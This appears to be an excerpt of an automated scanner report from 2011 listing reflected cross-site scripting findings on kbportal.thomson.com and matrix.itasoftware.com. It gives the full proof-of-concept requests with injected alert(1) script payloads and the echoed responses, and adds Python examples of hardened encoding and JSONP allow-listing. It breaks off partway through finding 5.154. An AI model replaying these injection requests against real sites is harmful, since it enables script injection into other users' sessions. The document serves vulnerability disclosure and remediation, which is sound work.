PortalSettings=cpId~21|ClientId~12|DisplayMode~2|AutoComplete~True|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~eeeef4|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/12/20/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; BIGipServerKB-80=428295335.20480.0000; s_cc=true; c_m2=1; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=Shipping%20Information; s_sq=%5B%5BB%5D%5D; s_ppv=100; IWICategory=IWICategory=

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:04:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Content-Length: 573


<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>TR Default</
...[SNIP]...
<FRAME frameBorder="no" name="frabar" id="frabar" noResize scrolling=no src="midframe_files/_top.aspx?tab=e5f5a"><script>alert(1)</script>563f308447c" style="border-bottom: #003366 1px solid"/>
...[SNIP]...

5.147. http://kbportal.thomson.com/display/2/index.aspx [tab parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kbportal.thomson.com
Path:   /display/2/index.aspx

Issue detail

The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a137c"><script>alert(1)</script>2f85ada7e43 was submitted in the tab parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /display/2/index.aspx?tab=a137c"><script>alert(1)</script>2f85ada7e43&c=&cpc=&cid=&cat=&catURL=&r=0.8218797 HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c=undefined571419undefined; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%5D; ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; LangCode=en-US; LangId=1; PortalSettings=cpId~21|ClientId~12|DisplayMode~2|AutoComplete~True|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~eeeef4|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/12/20/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; BIGipServerKB-80=428295335.20480.0000; IWICategory=IWICategory=21; s_cc=true; c_m2=1; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=Shipping%20Information; s_ppv=0; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:05:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: IWICategory=IWICategory=; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Content-Length: 1020


<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>TR Default</
...[SNIP]...
<frame name="fraLeftFrame" BORDERCOLOR=B3B3BA src="_leftframe.aspx?tab=a137c"><script>alert(1)</script>2f85ada7e43&searchstring=&searchtype=&searchby=&cat=&catURL=" FRAMEBORDER="1" BORDER="1"/>
...[SNIP]...

5.148. http://kbportal.thomson.com/display/2/optframe.aspx [opt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kbportal.thomson.com
Path:   /display/2/optframe.aspx

Issue detail

The value of the opt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bec10"><script>alert(1)</script>f83538fe8fc was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /display/2/optframe.aspx?opt=bec10"><script>alert(1)</script>f83538fe8fc HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
Referer: http://kbportal.thomson.com/display/2/_midframe.aspx?tab=opt2&aid=&searchstring=&searchtype=&searchby=&alp=&search=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c=undefined571419undefined; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%5D; ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; LangCode=en-US; LangId=1; BIGipServerKB-80=428295335.20480.0000; s_cc=true; c_m2=1; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=store%3Asecure%3Aemptybasket; s_sq=%5B%5BB%5D%5D; s_ppv=100; PortalSettings=cpId~88|ClientId~12|DisplayMode~2|AutoComplete~False|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~B3B3BA|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/BuiltIn/Default/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; IWICategory=IWICategory=

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:36:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 366


<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<frameset rows="*" border="0"
...[SNIP]...
<frame src="opt.aspx?opt=bec10"><script>alert(1)</script>f83538fe8fc" marginwidth="5" marginheight="5">
...[SNIP]...

5.149. http://kbportal.thomson.com/index.aspx [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kbportal.thomson.com
Path:   /index.aspx

Issue detail

The value of the t request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80f6c"><script>alert(1)</script>3cb59412b55 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /index.aspx?t=80f6c"><script>alert(1)</script>3cb59412b55&article=&c=12&cid=21&cpc= HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; c_m2=1; c=undefined571419burp; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849781175%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849784869%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303850887310%27%5D%5D; gpv_pn=store%3Apromotions%3Aemailpreferences%3Alogin; s_sq=%5B%5BB%5D%5D; s_ppv=100; ASP.NET_SessionId=wmip5h2o1slpk445xan1ev45; BIGipServerKB-80=2240234663.20480.0000; LangCode=en-US; LangId=1; IWICategory=IWICategory=21

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:00:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: IWICategory=IWICategory=21; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Content-Length: 978


<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>TR Default</
...[SNIP]...
<frame name="fraMidFrame" id="fraMidFrame" src="_midframe.aspx?tab=80f6c"><script>alert(1)</script>3cb59412b55&aid=&searchstring=&searchtype=&searchby=&alp=&search=" frameBORDER="no" />
...[SNIP]...
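
The two kbportal.thomson.com findings above (5.148 and 5.149) share one defect: a request parameter is concatenated into the query string of a frame src attribute, so a double quote followed by a closing angle bracket ends the attribute and the tag. The value sits in two contexts at once, a URL query parameter and a double-quoted HTML attribute, and needs both encodings applied inside-out: percent-encode the parameter value, then attribute-encode the finished URL. The Python below is an added example written for this report, not kbportal's ASP.NET code; the template string is copied from the 5.149 response, the payload is the one the scanner submitted, and the function names are the example's own.

```python
"""Added example for 5.148/5.149 (not kbportal code): building the
fraMidFrame src attribute with layered URL and HTML-attribute encoding."""
import html
from urllib.parse import urlencode

# Marker payload submitted in the t parameter in finding 5.149.
PAYLOAD = '80f6c"><script>alert(1)</script>3cb59412b55'

# The other query parameters the page passes through, all empty in the report.
MIDFRAME_PARAMS = ("aid", "searchstring", "searchtype", "searchby", "alp", "search")


def frame_src_vulnerable(tab: str) -> str:
    """Reproduces what the report observed: raw concatenation into the attribute,
    so a quote in tab closes src="..." and a > closes the frame tag."""
    return ('<frame name="fraMidFrame" id="fraMidFrame" src="_midframe.aspx?tab=' + tab
            + '&aid=&searchstring=&searchtype=&searchby=&alp=&search=" frameBORDER="no" />')


def build_midframe_url(tab: str) -> str:
    """URL layer: urlencode percent-encodes every value, so quotes, angle
    brackets, ampersands and equals signs cannot alter the query structure."""
    params = [("tab", tab)] + [(name, "") for name in MIDFRAME_PARAMS]
    return "_midframe.aspx?" + urlencode(params)


def frame_src_hardened(tab: str) -> str:
    """HTML layer: the finished URL is attribute-encoded. quote=True escapes
    the double quote the report's payload relies on; the & separators become
    &amp;, which the browser decodes back before requesting the URL."""
    url = html.escape(build_midframe_url(tab), quote=True)
    return '<frame name="fraMidFrame" id="fraMidFrame" src="' + url + '" frameBORDER="no" />'


if __name__ == "__main__":
    print(frame_src_vulnerable(PAYLOAD))
    print(frame_src_hardened(PAYLOAD))
```

Encoding only the HTML layer would still be wrong: a bare html.escape on the tab value leaves `&` and `=` free to add or override query parameters in the framed URL, which is why the percent-encoding step comes first.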

5.150. http://matrix.itasoftware.com/geosearch/service/json/getByCode/salesCity [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://matrix.itasoftware.com
Path:   /geosearch/service/json/getByCode/salesCity

Issue detail

The value of the callback request parameter is used as the JSONP callback function name and is echoed unmodified at the start of the response body. The payload 879db<script>alert(1)</script>cb5517fdab7 was submitted in the callback parameter.

This demonstrates that arbitrary input reaches the response unencoded, but the response is served as application/json, not text/html, so a browser that navigates to this URL directly will not render the script tag. The response also carries no X-Content-Type-Options: nosniff header, so whether any browser content-sniffs the body as HTML has to be checked per browser before the High rating is confirmed. The server-side fix is to accept only a bare or dotted JavaScript identifier as the callback name and to send the body as application/javascript with nosniff.

Request

GET /geosearch/service/json/getByCode/salesCity?code=BOS&callback=dojo.io.script.jsonp_dojoIoScript1._jsonpCallback879db<script>alert(1)</script>cb5517fdab7 HTTP/1.1
Host: matrix.itasoftware.com
Proxy-Connection: keep-alive
Referer: http://matrix.itasoftware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=269716137.1303847753.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269716137.2091474344.1303847753.1303847753.1303847753.1; __utmc=269716137; __utmb=269716137.10.10.1303847753

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 19:57:22 GMT
Server: Apache-Coyote/1.1
Content-Type: application/json
Content-Length: 257

dojo.io.script.jsonp_dojoIoScript1._jsonpCallback879db<script>alert(1)</script>cb5517fdab7({"timezone":"America/New_York","name":"Boston, MA","salesCityName":"Boston","longitude":-71.005278,"salesCity":"BOS","latitude":42.3644444,"code":"BOS","city":"BOS"})

5.151. http://matrix.itasoftware.com/geosearch/service/json/suggest/citiesAndAirports [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://matrix.itasoftware.com
Path:   /geosearch/service/json/suggest/citiesAndAirports

Issue detail

As in 5.150, the value of the callback request parameter is used as the JSONP callback function name and is echoed unmodified at the start of the response body. The payload abc66<script>alert(1)</script>6d35eb2d05e was submitted in the callback parameter.

The same caveat applies: the response is application/json without X-Content-Type-Options: nosniff, so the script tag is not rendered on direct navigation and exploitability depends on content sniffing in the target browser. The callback name should be restricted to a JavaScript identifier allow-list.

Request

GET /geosearch/service/json/suggest/citiesAndAirports?name=b&callback=dojo.io.script.jsonp_dojoIoScript2._jsonpCallbackabc66<script>alert(1)</script>6d35eb2d05e HTTP/1.1
Host: matrix.itasoftware.com
Proxy-Connection: keep-alive
Referer: http://matrix.itasoftware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=269716137.1303847753.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=241137183.1303847824.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=241137183.2018797994.1303847824.1303847824.1303847824.1; __utmc=241137183; __utmb=241137183.2.10.1303847824; __utma=269716137.2091474344.1303847753.1303847753.1303847753.1; __utmc=269716137; __utmb=269716137.13.10.1303847753

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 19:57:25 GMT
Server: Apache-Coyote/1.1
Content-Type: application/json
Content-Length: 10480

dojo.io.script.jsonp_dojoIoScript2._jsonpCallbackabc66<script>alert(1)</script>6d35eb2d05e([{"timezone":"America/New_York","cityName":"Boston","name":"Boston Logan International, MA (BOS)","score":1077.3821051617047,"longitude":-71.005278,"code":"BOS","latitude":42.3644444,"type":"airport",
...[SNIP]...
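
What a hardened version of the two geosearch JSONP endpoints (5.150 and 5.151) looks like. This Python is an added example, not ITA Software's code: the allow-list regular expression, the function names and the 400 response for a rejected name are the example's assumptions, while the BOS record and the callback name come from the report. The point is that the callback name is the only untrusted thing in the body, so a strict identifier allow-list removes the reflection entirely, and serving the result as application/javascript with X-Content-Type-Options: nosniff stops a browser from guessing the type.

```python
"""Added example for findings 5.150 and 5.151 (not ITA Software's code):
a JSONP endpoint that refuses callback names outside a strict allow-list
and labels its body so browsers do not treat it as HTML.

Assumptions: the handler returns (status, headers, body) tuples instead of
touching a socket, and the 400 response for bad names is this example's
choice. The BOS record is the response captured in 5.150.
"""
import json
import re
from typing import Optional, Tuple

# A bare or dotted JavaScript identifier path such as
# dojo.io.script.jsonp_dojoIoScript1._jsonpCallback. Angle brackets,
# quotes, parentheses, whitespace and anything non-ASCII are refused.
CALLBACK_RE = re.compile(r"[A-Za-z_$][A-Za-z0-9_$]*(?:\.[A-Za-z_$][A-Za-z0-9_$]*)*")
MAX_CALLBACK_LEN = 128

# Body returned for code=BOS in 5.150, embedded so the example runs offline.
BOS = {"timezone": "America/New_York", "name": "Boston, MA", "salesCityName": "Boston",
       "longitude": -71.005278, "salesCity": "BOS", "latitude": 42.3644444,
       "code": "BOS", "city": "BOS"}


def valid_callback(name: Optional[str]) -> bool:
    """True only for an identifier path of bounded length; fails closed on None or ''."""
    return bool(name) and len(name) <= MAX_CALLBACK_LEN and CALLBACK_RE.fullmatch(name) is not None


def get_by_code_vulnerable(callback: str, data: dict) -> Tuple[int, dict, str]:
    """What the report shows: the callback is concatenated in unchecked and the
    result is served as application/json with no nosniff header."""
    body = callback + "(" + json.dumps(data, separators=(",", ":")) + ")"
    return 200, {"Content-Type": "application/json"}, body


def get_by_code_hardened(callback: Optional[str], data: dict) -> Tuple[int, dict, str]:
    """Allow-listed callback, script media type, nosniff, and a leading comment
    so the body never begins with request-controlled bytes."""
    headers = {"X-Content-Type-Options": "nosniff"}
    payload = json.dumps(data, separators=(",", ":"))   # ensure_ascii (default) also escapes U+2028/U+2029
    if callback is None:                                  # plain JSON when no callback is requested
        headers["Content-Type"] = "application/json; charset=utf-8"
        return 200, headers, payload
    if not valid_callback(callback):                      # refuse, never sanitize, a bad name
        headers["Content-Type"] = "application/json; charset=utf-8"
        return 400, headers, json.dumps({"error": "invalid callback name"})
    headers["Content-Type"] = "application/javascript; charset=utf-8"
    return 200, headers, "/**/ " + callback + "(" + payload + ");"


if __name__ == "__main__":
    bad = "dojo.io.script.jsonp_dojoIoScript1._jsonpCallback879db<script>alert(1)</script>cb5517fdab7"
    print(get_by_code_vulnerable(bad, BOS)[2])
    print(get_by_code_hardened(bad, BOS))
```

A name that fails the allow-list is refused rather than cleaned up, because whoever controls the callback controls the first bytes of the response body. The leading /**/ is the same prefix Google added to its JSONP endpoints after the Rosetta Flash attack, so the body never starts with request-controlled bytes even for names the allow-list accepts.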

5.152. http://matrix.itasoftware.com/xhr/shop/search [format parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://matrix.itasoftware.com
Path:   /xhr/shop/search

Issue detail

The value of the format request parameter is reflected unmodified inside a JSON string value: the server attempts an enum lookup on it and echoes the failing name back in the error message ("No enum const class com.itasoftware.bbx.client.response.ResponseFormat.JSON83c7a..."). The payload 83c7a<script>alert(1)</script>1b026227aec was submitted in the format parameter.

The response is served as application/json;charset=UTF-8 and is prefixed with {}&& (a guard against JSON hijacking), so it is not rendered as HTML on direct navigation and the reflected markup is inert unless a client inserts the error message into the DOM without encoding; the rating should be confirmed against that client code rather than taken as Certain. The response has no X-Content-Type-Options: nosniff header, and the raw enum error also discloses a server-side class name.

Request

GET /xhr/shop/search?name=specificDates&summarizers=carrierStopMatrix%2CcurrencyNotice%2CsolutionList%2CitineraryPriceSlider%2CitineraryCarrierList%2CitineraryDepartureTimeRanges%2CitineraryArrivalTimeRanges%2CdurationSliderItinerary%2CitineraryOrigins%2CitineraryDestinations%2CitineraryStopCountList%2CwarningsItinerary&format=JSON83c7a<script>alert(1)</script>1b026227aec&inputs=%7B%22salesCity%22%3A%22BOS%22%2C%22slices%22%3A%5B%7B%22origins%22%3A%5B%22BOS%22%5D%2C%22destinations%22%3A%5B%22MIA%22%5D%2C%22date%22%3A%222011-04-30%22%2C%22isArrivalDate%22%3Afalse%2C%22dateModifier%22%3A%7B%22minus%22%3A0%2C%22plus%22%3A0%7D%7D%2C%7B%22destinations%22%3A%5B%22BOS%22%5D%2C%22origins%22%3A%5B%22MIA%22%5D%2C%22date%22%3A%222011-05-18%22%2C%22isArrivalDate%22%3Afalse%2C%22dateModifier%22%3A%7B%22minus%22%3A0%2C%22plus%22%3A0%7D%7D%5D%2C%22pax%22%3A%7B%22adults%22%3A1%7D%2C%22cabin%22%3A%22COACH%22%2C%22changeOfAirport%22%3Atrue%2C%22checkAvailability%22%3Atrue%2C%22page%22%3A%7B%22size%22%3A30%7D%2C%22sorts%22%3A%22default%22%7D HTTP/1.1
Host: matrix.itasoftware.com
Proxy-Connection: keep-alive
Referer: http://matrix.itasoftware.com/view/flights?session=9dec83c4-0dea-4ecc-8e10-94096c69ac61
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=269716137.1303847753.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=241137183.1303847824.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269716137.2091474344.1303847753.1303847753.1303847753.1; __utmc=269716137; __utmb=269716137.13.10.1303847753; searchFormState=%7B%22version%22%3A%220.7.20110124.2%22%2C%22json%22%3A%22%7B%5C%22mode%5C%22%3A%7B%5C%22date%5C%22%3A%5C%22exact%5C%22%2C%5C%22flightSelection%5C%22%3A%5C%22trip%5C%22%2C%5C%22flightView%5C%22%3A%5C%22trip%5C%22%2C%5C%22pageFlow%5C%22%3A%5C%22exact%5C%22%2C%5C%22trip%5C%22%3A%5C%22rt%5C%22%2C%5C%22calendarRange%5C%22%3A%5C%2230day%5C%22%7D%2C%5C%22searchForm%5C%22%3A%7B%5C%22mode%5C%22%3A%5C%22advanced%5C%22%2C%5C%22defaults%5C%22%3A%7B%5C%22multiCityRows%5C%22%3A2%7D%2C%5C%22awards%5C%22%3A%5C%22noawards%5C%22%2C%5C%22options%5C%22%3A%7B%5C%22showRoutingCodes%5C%22%3Afalse%2C%5C%22showFlightTimes%5C%22%3A%5Bfalse%2Cfalse%5D%2C%5C%22pax%5C%22%3A%5C%22simple%5C%22%7D%7D%7D%22%7D; __utma=241137183.2018797994.1303847824.1303847824.1303847824.1; __utmc=241137183; __utmb=241137183.3.10.1303847824

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 19:59:49 GMT
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Content-Type: application/json;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Content-Length: 132

{}&&{"error":"No enum const class com.itasoftware.bbx.client.response.ResponseFormat.JSON83c7a<script>alert(1)</script>1b026227aec"}

5.153. http://matrix.itasoftware.com/xhr/shop/search [name parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://matrix.itasoftware.com
Path:   /xhr/shop/search

Issue detail

The value of the name request parameter is reflected unmodified inside a JSON string value in the error message "Unrecognized search name ...". The payload 5d5d4<script>alert(1)</script>92fc2adddae was submitted in the name parameter.

The same conditions as in 5.152 apply: the body is application/json prefixed with {}&&, without X-Content-Type-Options: nosniff, so the markup executes only if a client renders the message as HTML. Confirm that before accepting the rating.

Request

GET /xhr/shop/search?name=specificDates5d5d4<script>alert(1)</script>92fc2adddae&summarizers=carrierStopMatrix%2CcurrencyNotice%2CsolutionList%2CitineraryPriceSlider%2CitineraryCarrierList%2CitineraryDepartureTimeRanges%2CitineraryArrivalTimeRanges%2CdurationSliderItinerary%2CitineraryOrigins%2CitineraryDestinations%2CitineraryStopCountList%2CwarningsItinerary&format=JSON&inputs=%7B%22salesCity%22%3A%22BOS%22%2C%22slices%22%3A%5B%7B%22origins%22%3A%5B%22BOS%22%5D%2C%22destinations%22%3A%5B%22MIA%22%5D%2C%22date%22%3A%222011-04-30%22%2C%22isArrivalDate%22%3Afalse%2C%22dateModifier%22%3A%7B%22minus%22%3A0%2C%22plus%22%3A0%7D%7D%2C%7B%22destinations%22%3A%5B%22BOS%22%5D%2C%22origins%22%3A%5B%22MIA%22%5D%2C%22date%22%3A%222011-05-18%22%2C%22isArrivalDate%22%3Afalse%2C%22dateModifier%22%3A%7B%22minus%22%3A0%2C%22plus%22%3A0%7D%7D%5D%2C%22pax%22%3A%7B%22adults%22%3A1%7D%2C%22cabin%22%3A%22COACH%22%2C%22changeOfAirport%22%3Atrue%2C%22checkAvailability%22%3Atrue%2C%22page%22%3A%7B%22size%22%3A30%7D%2C%22sorts%22%3A%22default%22%7D HTTP/1.1
Host: matrix.itasoftware.com
Proxy-Connection: keep-alive
Referer: http://matrix.itasoftware.com/view/flights?session=9dec83c4-0dea-4ecc-8e10-94096c69ac61
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=269716137.1303847753.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=241137183.1303847824.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269716137.2091474344.1303847753.1303847753.1303847753.1; __utmc=269716137; __utmb=269716137.13.10.1303847753; searchFormState=%7B%22version%22%3A%220.7.20110124.2%22%2C%22json%22%3A%22%7B%5C%22mode%5C%22%3A%7B%5C%22date%5C%22%3A%5C%22exact%5C%22%2C%5C%22flightSelection%5C%22%3A%5C%22trip%5C%22%2C%5C%22flightView%5C%22%3A%5C%22trip%5C%22%2C%5C%22pageFlow%5C%22%3A%5C%22exact%5C%22%2C%5C%22trip%5C%22%3A%5C%22rt%5C%22%2C%5C%22calendarRange%5C%22%3A%5C%2230day%5C%22%7D%2C%5C%22searchForm%5C%22%3A%7B%5C%22mode%5C%22%3A%5C%22advanced%5C%22%2C%5C%22defaults%5C%22%3A%7B%5C%22multiCityRows%5C%22%3A2%7D%2C%5C%22awards%5C%22%3A%5C%22noawards%5C%22%2C%5C%22options%5C%22%3A%7B%5C%22showRoutingCodes%5C%22%3Afalse%2C%5C%22showFlightTimes%5C%22%3A%5Bfalse%2Cfalse%5D%2C%5C%22pax%5C%22%3A%5C%22simple%5C%22%7D%7D%7D%22%7D; __utma=241137183.2018797994.1303847824.1303847824.1303847824.1; __utmc=241137183; __utmb=241137183.3.10.1303847824

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 19:59:48 GMT
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Content-Type: application/json;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Content-Length: 163

{}&&{"error":{"message":"Unrecognized search name \"specificDates5d5d4<script>alert(1)</script>92fc2adddae\".","resultId":"dRTmERQSGdEwBNSoA0DBeB","type":"input"}}

5.154. http://matrix.itasoftware.com/xhr/shop/search [summarizers parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://matrix.itasoftware.com
Path:   /xhr/shop/search

Issue detail

The value of the summarizers request parameter is reflected unmodified inside a JSON string value in the error message "Unrecognized summarizer nickname ...". The payload f3f22<script>alert(1)</script>35448f73c03 was submitted in the summarizers parameter.

